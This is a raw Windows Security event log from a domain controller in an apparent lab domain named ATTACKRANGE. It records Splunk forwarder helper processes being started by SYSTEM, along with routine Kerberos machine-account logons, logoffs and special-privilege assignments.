Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x185c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264693
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264695
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1288
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264694
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17b4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:29:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264696
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84FAAC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264699
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x852EC3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:29:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264698
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x852EC3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53593
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:29:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264697
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x852EC3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:30:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264700
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x138c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264702
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264701
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x56c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264703
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1908
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264704
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17ec
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264706
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1378
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264705
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:30:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264709
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x856799
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:30:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264708
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x856799
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53607
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:30:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264707
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x856799
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:31:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264710
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264712
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1050
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264711
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x10c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264713
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1610
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:31:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264714
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x858153
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 53884
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
